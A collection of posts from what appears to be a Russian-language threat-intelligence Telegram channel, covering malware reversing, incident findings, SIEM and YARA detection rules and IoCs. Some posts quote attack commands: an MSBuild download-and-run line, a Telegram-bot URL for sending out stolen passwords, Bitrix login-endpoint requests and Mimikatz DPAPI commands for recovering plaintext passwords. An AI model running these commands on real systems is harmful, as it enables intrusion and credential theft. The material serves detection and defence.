Рапид-расшифровка данных из NSIS-скрипта 🗄
Когда нет времени на идентификацию алгоритма шифрования и реализацию алгоритма дешифрования, на помощь приходит отладчик. Но как быть со скриптовым языком для установщика?
В качестве примера взят загрузчик XDigo
• Для начала извлечем скрипт, расширение которого — .nsi. Воспользуемся специальной версией 7-Zip.
• После этого нам нужен компилятор .nsi-скриптов — скачаем и установим NSIS. Откроем компилятор и загрузим в него извлеченный скрипт. Базовые возможности программы ограничены: он позволяет только скомпилировать скрипт в исполняемый файл и запустить его.
• Для того чтобы расширить функциональность компилятора, нам понадобится Debug Plug-In. Набор его функций не очень широк, но их вполне хватит, чтобы динамически расшифровать данные.
• После установки плагина откроем исходный вредоносный скрипт и в конце функции дешифрования, после операции передачи расшифрованных данных в стек, добавим строку:
• В результате перекомпиляции скрипта и тестового запуска исполняемого файла каждый раз после выполнения функции дешифрования в отдельном окне будет демонстрироваться состояние стека на момент выполнения строки Debug::Stack, в данных которого и будут находиться расшифрованные данные.
#reverse #tips #malware #XDigo #TI
@ptescalator
Когда нет времени на идентификацию алгоритма шифрования и реализацию алгоритма дешифрования, на помощь приходит отладчик. Но как быть со скриптовым языком для установщика?
В качестве примера взят загрузчик XDigo
• Для начала извлечем скрипт, расширение которого — .nsi. Воспользуемся специальной версией 7-Zip.
• После этого нам нужен компилятор .nsi-скриптов — скачаем и установим NSIS. Откроем компилятор и загрузим в него извлеченный скрипт. Базовые возможности программы ограничены: он позволяет только скомпилировать скрипт в исполняемый файл и запустить его.
• Для того чтобы расширить функциональность компилятора, нам понадобится Debug Plug-In. Набор его функций не очень широк, но их вполне хватит, чтобы динамически расшифровать данные.
• После установки плагина откроем исходный вредоносный скрипт и в конце функции дешифрования, после операции передачи расшифрованных данных в стек, добавим строку:
Debug::Stack
• В результате перекомпиляции скрипта и тестового запуска исполняемого файла каждый раз после выполнения функции дешифрования в отдельном окне будет демонстрироваться состояние стека на момент выполнения строки Debug::Stack, в данных которого и будут находиться расшифрованные данные.
#reverse #tips #malware #XDigo #TI
@ptescalator
🔥10👍3❤2
C:\Windows\SysWOW64\smb_context.log — журнал событий smb от одного именитого антивирусного вендора.
Механизм работы пока не исследован нами до конца, но мы выяснили: анализируя данный журнал, можно обнаруживать факты выполнения команд, в частности, с использованием утилиты smbexec, а также факты доступа к файлам на диске.
Журнал может содержать следующие события:
PDMSmbFileAccessed
PDMSmbCreateFile
PDMSmbRenameFile
Пример:
<BeginStream>
PDMSmbFileAccessed("$windir\__1715675753.48",00000011000000000010010100100000,1399528814);
PDMSmbFileAccessed("$system32\cmpspy.dll",00001011110000000010001100100001,1399106043);
PDMSmbFileAccessed("$system32\reg.bat",00001011110000000010001100100001,1399106043);
<EndStream>
<BeginStream>
PDMSmbFileAccessed("$windir\psexesvc.exe",00001010100000000010001100100001,405741904);
<EndStream>
#tool #detect #hunt
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥14👍4😱4
Проактивный хантинг C2-серверов 👨💻
В процессе хантинга C2-серверов появляется важный вопрос — какие артефакты использовать для лучшей результативности и точности: искать по WHOIS-записям, регулярным выражениям для субдоменов, по NS-серверам, DDNS, резолвам на один IP-адрес и т. п. С этой точки зрения лучшим чаще всего является фингерпринт SSL-сертификата, используемого на C2-сервере.
Благодаря мониторингу фингерпринта сертификата через Censys,
который мы ранее видели на C2-сервере, используемом GoRed в атаках на российские организации, в июне этого года был обнаружен новый C2-сервер GoRed, а также дополнительные сетевые индикаторы.
IoC:
#TI #ExCobalt #GoRed #C2
@ptescalator
В процессе хантинга C2-серверов появляется важный вопрос — какие артефакты использовать для лучшей результативности и точности: искать по WHOIS-записям, регулярным выражениям для субдоменов, по NS-серверам, DDNS, резолвам на один IP-адрес и т. п. С этой точки зрения лучшим чаще всего является фингерпринт SSL-сертификата, используемого на C2-сервере.
Благодаря мониторингу фингерпринта сертификата через Censys,
services.tls.certificate.fingerprint_sha256: "aea6e20b6abcf58c27eab43de08d7b1cd988fc68c471b5cdcc812851df8c8748"
который мы ранее видели на C2-сервере, используемом GoRed в атаках на российские организации, в июне этого года был обнаружен новый C2-сервер GoRed, а также дополнительные сетевые индикаторы.
IoC:
passwade.ru
dnslan.ru
wglan.ru
mskde.ru
mskde.online
myldap.ru
#TI #ExCobalt #GoRed #C2
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥15👍4👏1
Практика наших расследований инцидентов показывает, что злоумышленники все еще используют Microsoft Build Engine для компиляции .NET и запуска Cobalt Strike Beacon на скомпрометированных узлах.
Предварительно на хост загружается конфигурация проекта .NET, представленная в формате XML. Конфигурация содержит в себе встроенную задачу.
Код задачи описан в структуре:
<Task> <Code Type="Fragment" Language="cs"> <![CDATA[...]]> </Code> </Task>
Задача — это блок исполняемого кода, с помощью которого MSBuild выполняет атомарные операции, которые используются разработчиками в процессе сборки проектов. В рассматриваемом случае злоумышленники используют данный механизм для запуска ВПО.
После успешной загрузки конфигурации запускается MSBuild, где параметром указан путь до конфигурации проекта. В результате на скомпрометированном хосте компилируется и запускается .NET библиотека. Она расшифровывает полезную нагрузку и вызывает функцию EnumChildWindows, которая исполняет шелл-код.
Пример запуска:
wget https://maliciouswebsite[.]com/doWqkwoown/update.csproj -O C:\Windows\Temp\update.csproj; C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Temp\update.csproj
Yara:
rule Susp_Microsoft_Build_Engine_XML_Schema {
strings:
$s1 = "TaskFactory=\"CodeTaskFactory"
$s2 = "VirtualAllocEx(0xFFFFFFFF, 0, (UInt32)"
$e1 = "EnumChildWindows"
$e2 = "EnumDisplayMonitors"
condition:
all of ($s*) and any of ($e*)
}
Дополнительные материалы 👈
#dfir #hunt #detect #yara #win
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥16🆒3👍1
👏 Раз-два — и готово. Генерируем FLIRT-сигнатуры
А делаем это, чтобы не тратить время на распознавание библиотечного кода PureBasic, на котором написан COM-DLL-Dropper группировки ExCobalt.
Для начала нам понадобится компилятор PureBasic. Скачав его и установив или распаковав, найдем все .lib-файлы. Далее нам понадобятся входящие в состав Flair инструменты:
—
—
С их помощью мы и сгенерируем сигнатуры. Чтобы автоматизировать создание PAT-файла, будем использовать BAT-файл со следующим содержимым:
После получения PAT-файла нам нужно преобразовать его в SIG-файл. Для этого выполним следующую команду:
Так как произошли коллизии при генерации сигнатур, получаем следующий список файлов:
— PureBasic_x86.err,
— PureBasic_x86.exc,
— PureBasic_x86.pat.
При отсутствии коллизий сразу получили бы готовый SIG-файл. Для их устранения нужно отредактировать EXC-файл. Пример коллизии:
Видим, что три функции имеют одну и ту же сигнатуру, — нам необходимо выбрать, какую из них использовать.
Слева, рядом с именем нужной функции, ставим +. В этом случае коллизия коснулась функций, идентичных по назначению, и мы можем выбрать любую:
Но бывает, когда она касается функций с совершенно противоположным назначением, — можно выбрать любую, но запомнить или записать ее: это пригодится, когда будет получен результат.
Нужно также удалить строку --------- в EXC-файле, чтобы выбор учитывался при повторной генерации сигнатур:
После того как действие будет проделано для всех коллизий, нужно повторить генерацию. Если все сделано правильно, мы получим SIG-файл. Его следует положить в:
#reverse #tips #ComDllDropper #ExCobalt #APT #TI
@ptescalator
А делаем это, чтобы не тратить время на распознавание библиотечного кода PureBasic, на котором написан COM-DLL-Dropper группировки ExCobalt.
Для начала нам понадобится компилятор PureBasic. Скачав его и установив или распаковав, найдем все .lib-файлы. Далее нам понадобятся входящие в состав Flair инструменты:
—
pcf — парсер файлов .lib и .obj, создает PAT-файл из COFF-файлов.—
sigmake — конвертирует ранее созданный PAT-файл в SIG-файл для IDA.С их помощью мы и сгенерируем сигнатуры. Чтобы автоматизировать создание PAT-файла, будем использовать BAT-файл со следующим содержимым:
@echo off
\path\pcf.exe -a \path\Debugger.lib
\path\PureBasic_x86.pat
\path\pcf.exe -a \path\libmariadb.lib
\path\PureBasic_x86.pat
...
После получения PAT-файла нам нужно преобразовать его в SIG-файл. Для этого выполним следующую команду:
\path\sigmake.exe -n"PureBasic_Windows_X86_LTS_6.03" \path\PureBasic_x86.pat \path\PureBasic_x86.sig
Так как произошли коллизии при генерации сигнатур, получаем следующий список файлов:
— PureBasic_x86.err,
— PureBasic_x86.exc,
— PureBasic_x86.pat.
При отсутствии коллизий сразу получили бы готовый SIG-файл. Для их устранения нужно отредактировать EXC-файл. Пример коллизии:
_PB_WriteFloat@8 0B 5366........E8........85C0742D83780400
_PB_WriteInteger@8 0B 5366........E8........85C0742D83780400
_PB_WriteLong@8 0B 5366........E8........85C0742D83780400
Видим, что три функции имеют одну и ту же сигнатуру, — нам необходимо выбрать, какую из них использовать.
Слева, рядом с именем нужной функции, ставим +. В этом случае коллизия коснулась функций, идентичных по назначению, и мы можем выбрать любую:
_PB_WriteFloat@8 0B 5366........E8........85C0742D83780400
+_PB_WriteInteger@8 0B 5366........E8........85C0742D83780400
_PB_WriteLong@8 0B 5366........E8........85C0742D83780400
Но бывает, когда она касается функций с совершенно противоположным назначением, — можно выбрать любую, но запомнить или записать ее: это пригодится, когда будет получен результат.
Нужно также удалить строку --------- в EXC-файле, чтобы выбор учитывался при повторной генерации сигнатур:
;--------- (delete these lines to allow sigmake to read this fil
; add '+' at the start of a line to select a module
; add '-' if you are not sure about the selection
; do nothing if you want to exclude all modules
После того как действие будет проделано для всех коллизий, нужно повторить генерацию. Если все сделано правильно, мы получим SIG-файл. Его следует положить в:
%IDA Home%\sig\pc
#reverse #tips #ComDllDropper #ExCobalt #APT #TI
@ptescalator
🔥11👍5👏3
Форму авторизации видишь? Нет. Вот и я не вижу. А она есть 🤔
В ходе недавнего расследования одного из инцидентов мы столкнулись с эксплуатацией злоумышленниками уязвимости в CMS Bitrix, связанной со множеством доступных эндпойнтов для аутентификации.
Несмотря на то, что данная уязвимость не является новой, ей все еще подвержено немалое количество веб-сайтов.
Многие администраторы закрывают доступ к странице /bitrix/admin, при этом не догадываясь, что есть еще ряд скриптов, использующих компонент prolog_admin_before.php, благодаря которому можно получить доступ к форме авторизации🤕
Среди них можно выделить:
Именно эндпойнт player_playlist_edit.php был использован злоумышленниками для аутентификации:
Вероятно, для доступа к системе использовались стандартные учетные данные, так как в логах веб-сервера мы увидели всего лишь несколько POST-запросов, предшествующих началу сессии.
👀 Эта уязвимость — наряду со многими другими — описана в отчете об уязвимостях Bitrix (п. 1.4.1).
Судя по всему, этим же отчетом пользовались и злоумышленники во время атаки: некоторые запросы, полностью совпадающие с приведенными в тексте отчета, были обнаружены нами при анализе логов. Например:
Помимо того, атакующие осуществляли запрос к каждому из приведенных выше эндпойнтов для аутентификации.
#dfir #detect #cve #web
@ptescalator
В ходе недавнего расследования одного из инцидентов мы столкнулись с эксплуатацией злоумышленниками уязвимости в CMS Bitrix, связанной со множеством доступных эндпойнтов для аутентификации.
Несмотря на то, что данная уязвимость не является новой, ей все еще подвержено немалое количество веб-сайтов.
Многие администраторы закрывают доступ к странице /bitrix/admin, при этом не догадываясь, что есть еще ряд скриптов, использующих компонент prolog_admin_before.php, благодаря которому можно получить доступ к форме авторизации
Среди них можно выделить:
— /bitrix/components/bitrix/desktop/admin_settings.php
— /bitrix/components/bitrix/map.yandex.search/settings/settings.php
— /bitrix/components/bitrix/player/player_playlist_edit.php
— /bitrix/tools/autosave.php
— /bitrix/tools/get_catalog_menu.php
— /bitrix/tools/upload.php
Именно эндпойнт player_playlist_edit.php был использован злоумышленниками для аутентификации:
POST /bitrix/components/bitrix/player/player_playlist_edit.php?login=yes
Вероятно, для доступа к системе использовались стандартные учетные данные, так как в логах веб-сервера мы увидели всего лишь несколько POST-запросов, предшествующих началу сессии.
👀 Эта уязвимость — наряду со многими другими — описана в отчете об уязвимостях Bitrix (п. 1.4.1).
Судя по всему, этим же отчетом пользовались и злоумышленники во время атаки: некоторые запросы, полностью совпадающие с приведенными в тексте отчета, были обнаружены нами при анализе логов. Например:
GET /ololo/?SEF_APPLICATION_CUR_PAGE_URL=/bitrix/admin/
Помимо того, атакующие осуществляли запрос к каждому из приведенных выше эндпойнтов для аутентификации.
#dfir #detect #cve #web
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12👍4👏4
Снова пропустили момент запуска фишингового вложения? 📩
А что? Бухгалтерша уверена, что это был «счет на оплату» от проверенного банка. Пора уже научить SIEM-системы предупреждать вас об аномалиях, связанных с запуском вредоносных почтовых вложений!
Делимся с вами несколькими идеями для правил корелляции. Это первая часть. Скоро опубликуем еще 😉
1️⃣ Злоумышленники могут злоупотреблять двойным расширением в имени файла как средством маскировки настоящего типа файла.
Такие файлы часто используются во время фишинговых рассылок. Рекомендуется мониторить события запуска процесса (Windows 4688, Sysmon 1), в которых имя процесса заканчивается двойным расширением. В таких событиях сначала указываются популярные безобидные форматы файлов:
А затем — расширение исполняемого файла (.exe, .scr, .com), например: Счет_на_оплату_465937.doc.exe.
Пример regex-фильтра:
2️⃣ Выявлять подозрительные исходящие соединения от приложений Microsoft Office можно на основе событий Windows 5156 или Sysmon 3 с destination-портом 445, от имени процессов:
3️⃣ Полезно обращать внимание на открытие пользователем документов Microsoft Offiсe с макросом, а также мониторить связку событий запуска процесса приложения Microsoft Offiсe (Windows 4688, Sysmon 1; процессы: "winword.exe", "excel.exe", "powerpnt.exe", "msaccess.exe", "onenote.exe", "outlook.exe", "visio.exe", "winproj.exe").
И загрузки с помощью этого процесса библиотеки VBE7 (Sysmon 7; ImageLoaded = VBE7.DLL).
4️⃣ Атакующие могут отправить вредоносный документ в мессенджер, поэтому рекомендуется выявлять запуск процесса от родительского процесса мессенджера на основе событий Windows 4688, Sysmon 1 с родительскими процессами ParentProcessName:
С разными значениями в полях ParentProcessName и NewProcessName.
_
Подписывайтесь на @ptescalator, чтобы не пропустить вторую часть рекомендаций, которую мы опубликуем на следующей неделе 😏
#tips
@ptsecaltaor
А что? Бухгалтерша уверена, что это был «счет на оплату» от проверенного банка. Пора уже научить SIEM-системы предупреждать вас об аномалиях, связанных с запуском вредоносных почтовых вложений!
Делимся с вами несколькими идеями для правил корелляции. Это первая часть. Скоро опубликуем еще 😉
1️⃣ Злоумышленники могут злоупотреблять двойным расширением в имени файла как средством маскировки настоящего типа файла.
Такие файлы часто используются во время фишинговых рассылок. Рекомендуется мониторить события запуска процесса (Windows 4688, Sysmon 1), в которых имя процесса заканчивается двойным расширением. В таких событиях сначала указываются популярные безобидные форматы файлов:
.doc, .docx, .docm, .dot, .htm, .html, .odt, .pdf, .rtf, .txt, .xml, .csv, .xls, .xlsx, .xlsm, .zip, .zipx, .rar, .jar, .tar, .tar-gz, .tgz, .gz, .gzip, .7z, .pps, .ppsx, .ppt, .pptm, .pptx, .jpg, .jpeg, .gif, .png, .gif, .bmp, .raw, .tiff, .psd, .heif, .mp4, .mov, .wmv, .avi, .flv, .swf, .mkv
А затем — расширение исполняемого файла (.exe, .scr, .com), например: Счет_на_оплату_465937.doc.exe.
Пример regex-фильтра:
\.(doc|docx|docm|dot|htm|html|odt|pdf|rtf|txt|xml|csv|xls|xlsx|xlsm|zip|zipx|rar|jar|tar|tar-gz|tgz|gz|gzip|7z|pps|ppsx|ppt|pptm|pptx|jpg|jpeg|gif|png|gif|bmp|raw|tiff|psd|heif|mp4|mov|wmv|avi|flv|swf|mkv)\.(exe|scr|com)$
2️⃣ Выявлять подозрительные исходящие соединения от приложений Microsoft Office можно на основе событий Windows 5156 или Sysmon 3 с destination-портом 445, от имени процессов:
"winword.exe", "excel.exe", "powerpnt.exe", "visio.exe", "mspub.exe", "eqnedt32.exe", "outlook.exe"
3️⃣ Полезно обращать внимание на открытие пользователем документов Microsoft Offiсe с макросом, а также мониторить связку событий запуска процесса приложения Microsoft Offiсe (Windows 4688, Sysmon 1; процессы: "winword.exe", "excel.exe", "powerpnt.exe", "msaccess.exe", "onenote.exe", "outlook.exe", "visio.exe", "winproj.exe").
И загрузки с помощью этого процесса библиотеки VBE7 (Sysmon 7; ImageLoaded = VBE7.DLL).
4️⃣ Атакующие могут отправить вредоносный документ в мессенджер, поэтому рекомендуется выявлять запуск процесса от родительского процесса мессенджера на основе событий Windows 4688, Sysmon 1 с родительскими процессами ParentProcessName:
"skype.exe", "telegram.exe","whatsapp.exe", "teams.exe", "lync.exe"
С разными значениями в полях ParentProcessName и NewProcessName.
_
Подписывайтесь на @ptescalator, чтобы не пропустить вторую часть рекомендаций, которую мы опубликуем на следующей неделе 😏
#tips
@ptsecaltaor
🔥23👍6👏6
Как и обещали, делимся второй частью идей правил корреляции для SIEM-систем 👨💻
Первую часть можно найти в этом посте.
5️⃣ Выявлять подозрительную последовательность запуска процесса приложением Microsoft Office можно на основе событий запуска процесса *.exe Windows 4688 Sysmon 1 с родительскими процессами ParentProcessName ("winword.exe", "excel.exe", "powerpnt.exe", "visio.exe", "mspub.exe", "eqnedt32.exe", "outlook.exe", "acrord32.exe") с разными значениями в полях ParentProcessName и NewProcessName.
Исключения для NewProcessName:
6️⃣ Рекомендуем выявлять создание исполняемых файлов офисными программами:
• события создания процесса (Windows 4688, Sysmon 1);
• с именами Image: "winword.exe", "excel.exe", "powerpnt.exe", "visio.exe", "mspub.exe", "eqnedt32.exe", "outlook.exe", "msaccess.exe";
• расширение TargetFilename:
7️⃣ Офисная программа загружает DLL-библиотеку COM-объекта Internet Explorer (ieproxy.dll):
• события Sysmon 7;
• с именами Image: "winword.exe", "excel.exe", "powerpnt.exe", "visio.exe", "mspub.exe", "eqnedt32.exe", "outlook.exe", "msaccess.exe".
• значение "ieproxy.dll" в поле ImageLoaded.
#tips #siem #detect
@ptescalator
Первую часть можно найти в этом посте.
5️⃣ Выявлять подозрительную последовательность запуска процесса приложением Microsoft Office можно на основе событий запуска процесса *.exe Windows 4688 Sysmon 1 с родительскими процессами ParentProcessName ("winword.exe", "excel.exe", "powerpnt.exe", "visio.exe", "mspub.exe", "eqnedt32.exe", "outlook.exe", "acrord32.exe") с разными значениями в полях ParentProcessName и NewProcessName.
Исключения для NewProcessName:
"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe", "outlook.exe", "msosync.exe", "chrome.exe", "firefox.exe", "msedge.exe", "launcher.exe", "browser.exe", "acrord32.exe", "acrobat.exe", "rdrcef.exe", "adobearm.exe", "splwow64.exe", "visio.exe".
6️⃣ Рекомендуем выявлять создание исполняемых файлов офисными программами:
• события создания процесса (Windows 4688, Sysmon 1);
• с именами Image: "winword.exe", "excel.exe", "powerpnt.exe", "visio.exe", "mspub.exe", "eqnedt32.exe", "outlook.exe", "msaccess.exe";
• расширение TargetFilename:
.exe, .bat, .com, .cmd, .dll, .cpl, .msi, .sys, .scr, .ps1, .hta
7️⃣ Офисная программа загружает DLL-библиотеку COM-объекта Internet Explorer (ieproxy.dll):
• события Sysmon 7;
• с именами Image: "winword.exe", "excel.exe", "powerpnt.exe", "visio.exe", "mspub.exe", "eqnedt32.exe", "outlook.exe", "msaccess.exe".
• значение "ieproxy.dll" в поле ImageLoaded.
#tips #siem #detect
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥19👏4👍3
Телега с хакерами
Согласно последним тенденциям (например, Lazy Koala), злоумышленники все чаще прибегают к эксфильтрации данных или С2-каналу через мессенджер Telegram.
Это и правда просто: достаточно отправить такой веб-запрос, чтобы передать чувствительную информацию (например, пароли) с любого компьютера вашей инфраструктуры:
Таким образом, злоумышленники пытаются спрятать свою сетевую активность в потоках легитимных сетевых сессий к Telegram, которым сейчас пользуются практически везде.
Не учли злоумышленники только одного: сетевой трафик от десктопного или мобильного приложения Telegram и веб-запрос к API сильно отличаются.
Telegram API — это в том числе инструмент автоматизации и управления ботами. Если в вашей организации его и используют, то с определенных хостов и в ограниченном количестве.
🚩 Появление таких запросов с машины пользователя — красный флаг для ваших средств защиты. А найти такие сетевые сессии легко — одним запросом к NTA-системе:
#detect #network #tip
@ptescalator
Согласно последним тенденциям (например, Lazy Koala), злоумышленники все чаще прибегают к эксфильтрации данных или С2-каналу через мессенджер Telegram.
Это и правда просто: достаточно отправить такой веб-запрос, чтобы передать чувствительную информацию (например, пароли) с любого компьютера вашей инфраструктуры:
https://api.telegram.org/bot$BOT_TOKEN/sendMessage?text=LEAKED_PASSWORDS&chat_id=xxxx
Таким образом, злоумышленники пытаются спрятать свою сетевую активность в потоках легитимных сетевых сессий к Telegram, которым сейчас пользуются практически везде.
Не учли злоумышленники только одного: сетевой трафик от десктопного или мобильного приложения Telegram и веб-запрос к API сильно отличаются.
Telegram API — это в том числе инструмент автоматизации и управления ботами. Если в вашей организации его и используют, то с определенных хостов и в ограниченном количестве.
🚩 Появление таких запросов с машины пользователя — красный флаг для ваших средств защиты. А найти такие сетевые сессии легко — одним запросом к NTA-системе:
tls.server_name == "api.telegram.org"
#detect #network #tip
@ptescalator
🔥19👍6⚡4❤1
Эксфильтрация данных жертв в Telegram-боты злоумышленников может происходить не только со стационарных компьютеров или ноутбуков, но и с мобильных устройств. Как раз о таких стилерах мы выпустили исследование сегодня.
С их помощью хакеры перехватывали уведомления от приложений типа WhatsApp или банковских сервисов, выгружали фотографии с устройства.
Основной вектор заражения — фишинг через WhatsApp. В сообщениях хакеры рассылают либо сами вредоносные APK-файлы, либо ссылки на них. По нашим предположениям, цель злоумышленников — перехватить одноразовый пароль от личного кабинета в онлайн-банке, войти в аккаунт жертвы и украсть денежные средства.
#tips #android #cybercrime #TI
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8❤4🔥4
Недавно мы наткнулись на письмо с вредоносным вложением, отправленное группой Hive0117. Интересен подход к написанию: письмо сильно отличается от обычных рассылок, довольно прямолинейно манипулирующих эмоциями получателя с помощью акцента на срочности и попыток вызвать чувство страха.
IoCs:
Документ из налоговой(запрос).rar
a7712ac6ff3873f0106e16385e4b9b30
ba647a209c8d112f00a320a693f83827682e7e52
f226edad9d3a17d28008b376773bca62507d40494c5a1def5c8704a1bb815bae
Документ из налоговой(запрос).exe
85c8c66c34bb60e09e68f882831b1751
f96d695d04f0198fab85aa9bac66799cf2e710ed
8b309519bbb64be63ea3cf0f1ef58c5b36bbb5bf37d39f879ffb55d354937e16
fb0bf2b1.shop
185.189.13.113
https://fb0bf2b1.shop/index.php
#TI #Hive0117 #Phishing
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥16👍5👏2
DPAPI — популярный вектор для атак на ОС семейства Windows 💻
Ключи Wi-Fi, сертификаты, учетные данные, cookies браузеров, DropBox, Skype — и это только часть мишеней, на которые нацелены злоумышленники.
Сегодня разберем, что произойдет, если у пользователя сохранены учетные данные на рабочей станции, введенной в домен Active Directory, а злоумышленник загрузил на нее всем знакомый Mimikatz.
👀 Для начала рассмотрим, как связан DPAPI с учетными данными пользователей и другими секретами.
Интерфейс DPAPI используется компанией Microsoft в Windows с 2000-го года. Он позволяет хранить чувствительные данные пользователя в шифрованном виде.
Что использует этот интерфейс для шифрования данных?
• SID пользователя;
• hash пароля;
• Masterkey — ключевую сущность, за которой будут охотиться злоумышленники.
Masterkey в свою очередь генерируется из так называемых prekey и 64 рандомных байт. SID, hash пароля пользователя и Masterkey путем криптографических манипуляций образуют blob. Поэтому для расшифрования злоумышленнику нужно знать конкретный blob, который нужно расшифровать, Masterkey в открытом виде, hash пароля пользователя и его SID для расшифровки.
🗂 Упомянутые объекты и параметры содержатся в различных папках и ветках реестра. Нам интересны следующие папки:
• Папка с сredential blob
• Папка с файлами пользовательских mastekeys
• Папка с файлами приватных RSA-ключей
У одного пользователя может быть несколько masterkeys на узле. Злоумышленник сначала должен будет узнать, какой masterkey используется сейчас для blob с учетными данными.
Находясь на узле и загрузив Mimikatz, злоумышленник может найти эту информацию, прочитав свойства внутри blob с помощью команды mimikatz:
💡 Дисклеймер: если команды будут выполняться через Cobalt Strike или другой C2, то синтаксис команд будет другой.
Для корректной идентификации Masterkey необходимо обратить внимание на параметр guidMasterkey — это идентификатор Masterkey, который использовался для шифрования этого blob. Благодаря тому, что в нашем случае рабочая станция введена в домен и имеет с ним связь, можно запросить резервный RSA-ключ с контроллера домена.
Здесь важно отметить, что злоумышленник может запросить его только для своего авторизованного пользователя. Для того чтобы запросить этот ключ для всех пользователей и расшифровать все Masterkeys, понадобятся права доменного администратора.
Запрос RSA-ключа на контроллер домена будет выполнен со службы MS-BKRP (backupkey remote protocol) RPC:
В ответ злоумышленнику придет masterkey в открытом виде (параметр key:) и его sha1 hash.
После этого он может попытаться расшифровать учетные данные пользователя и получить пароль в открытом виде.
Сделает он это с помощью команды:
И получит на выходе в параметре CredentialBlob: пароль скомпрометированного пользователя💻
#DPAPI #win #hunt #ti
@ptescalator
Ключи Wi-Fi, сертификаты, учетные данные, cookies браузеров, DropBox, Skype — и это только часть мишеней, на которые нацелены злоумышленники.
Сегодня разберем, что произойдет, если у пользователя сохранены учетные данные на рабочей станции, введенной в домен Active Directory, а злоумышленник загрузил на нее всем знакомый Mimikatz.
Интерфейс DPAPI используется компанией Microsoft в Windows с 2000-го года. Он позволяет хранить чувствительные данные пользователя в шифрованном виде.
Что использует этот интерфейс для шифрования данных?
• SID пользователя;
• hash пароля;
• Masterkey — ключевую сущность, за которой будут охотиться злоумышленники.
Masterkey в свою очередь генерируется из так называемых prekey и 64 рандомных байт. SID, hash пароля пользователя и Masterkey путем криптографических манипуляций образуют blob. Поэтому для расшифрования злоумышленнику нужно знать конкретный blob, который нужно расшифровать, Masterkey в открытом виде, hash пароля пользователя и его SID для расшифровки.
🗂 Упомянутые объекты и параметры содержатся в различных папках и ветках реестра. Нам интересны следующие папки:
• Папка с сredential blob
\Users\<user>\appdata\local\microsoft\credentials\<credential blob>
• Папка с файлами пользовательских mastekeys
\Users\%USER%\AppData\Roaming\Microsoft\Protect\%SID%\
• Папка с файлами приватных RSA-ключей
%APPDATA%\Roaming\Microsoft\Crypto\RSA\<SID>\
У одного пользователя может быть несколько masterkeys на узле. Злоумышленник сначала должен будет узнать, какой masterkey используется сейчас для blob с учетными данными.
Находясь на узле и загрузив Mimikatz, злоумышленник может найти эту информацию, прочитав свойства внутри blob с помощью команды mimikatz:
dpapi::cred /in:C:\users\<username>\appdata\local\microsoft\credentials\<blob>
💡 Дисклеймер: если команды будут выполняться через Cobalt Strike или другой C2, то синтаксис команд будет другой.
Для корректной идентификации Masterkey необходимо обратить внимание на параметр guidMasterkey — это идентификатор Masterkey, который использовался для шифрования этого blob. Благодаря тому, что в нашем случае рабочая станция введена в домен и имеет с ним связь, можно запросить резервный RSA-ключ с контроллера домена.
Здесь важно отметить, что злоумышленник может запросить его только для своего авторизованного пользователя. Для того чтобы запросить этот ключ для всех пользователей и расшифровать все Masterkeys, понадобятся права доменного администратора.
Запрос RSA-ключа на контроллер домена будет выполнен со службы MS-BKRP (backupkey remote protocol) RPC:
dpapi::masterkey /in:C:\users\<username>\appdata\roaming\microsoft\protect\<SID>\<masterkey> /rpc
В ответ злоумышленнику придет masterkey в открытом виде (параметр key:) и его sha1 hash.
После этого он может попытаться расшифровать учетные данные пользователя и получить пароль в открытом виде.
Сделает он это с помощью команды:
dpapi::cred /in:C:\users\<username>\appdata\local\microsoft\credentials\<blob> /masterkey:<masterkey_as_plain_text>
И получит на выходе в параметре CredentialBlob: пароль скомпрометированного пользователя
#DPAPI #win #hunt #ti
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11🔥4❤2
ESCalator
DPAPI — популярный вектор для атак на ОС семейства Windows 💻 Ключи Wi-Fi, сертификаты, учетные данные, cookies браузеров, DropBox, Skype — и это только часть мишеней, на которые нацелены злоумышленники. Сегодня разберем, что произойдет, если у пользователя…
🔦 Для обнаружения активности можно использовать комбинацию событий на атакованной рабочей станции (1, 2) и контроллере домена (3):
1. Event ID 4663, применение права доступа к объекту. Здесь под объектами понимается содержимое упомянутых выше папок с credential blob, пользовательскими masterkeys и приватными RSA-ключами. Обращения к объектам этих папок будут выполнены в контексте скомпрометированного пользователя.
2. Установка TCP-соединения с DC, Sysmon 3 по порту 445. Проверить его доступность можно, создав в контексте скомпрометированного пользователя именованный канал Sysmon 17 с параметром PipeName: \\protected_storage.
3. Доступ к сетевому ресурсу с Event ID 5145. Несмотря на многочисленность событий, это событие можно связать с предыдущими, так как обращение выполняется в контексте скомпрометированного пользователя к общей папке \\IPC$\Protected_Storage, которая уже упомянута во втором пункте. Обращение к Protected_Storage — один из индикаторов возможных манипуляций с DPAPI.
#detect
@ptescalator
1. Event ID 4663, применение права доступа к объекту. Здесь под объектами понимается содержимое упомянутых выше папок с credential blob, пользовательскими masterkeys и приватными RSA-ключами. Обращения к объектам этих папок будут выполнены в контексте скомпрометированного пользователя.
2. Установка TCP-соединения с DC, Sysmon 3 по порту 445. Проверить его доступность можно, создав в контексте скомпрометированного пользователя именованный канал Sysmon 17 с параметром PipeName: \\protected_storage.
3. Доступ к сетевому ресурсу с Event ID 5145. Несмотря на многочисленность событий, это событие можно связать с предыдущими, так как обращение выполняется в контексте скомпрометированного пользователя к общей папке \\IPC$\Protected_Storage, которая уже упомянута во втором пункте. Обращение к Protected_Storage — один из индикаторов возможных манипуляций с DPAPI.
#detect
@ptescalator
🔥8👍7👏3
В ходе анализа внешней экспертизы, на одном из ресурсов, в основном публикующих материалы об угрозах для китайской инфраструктуры, мы наткнулись на одну интересную, но достаточно немногословную статью о загрузчике RustyNet APT-группировки Patchwork.
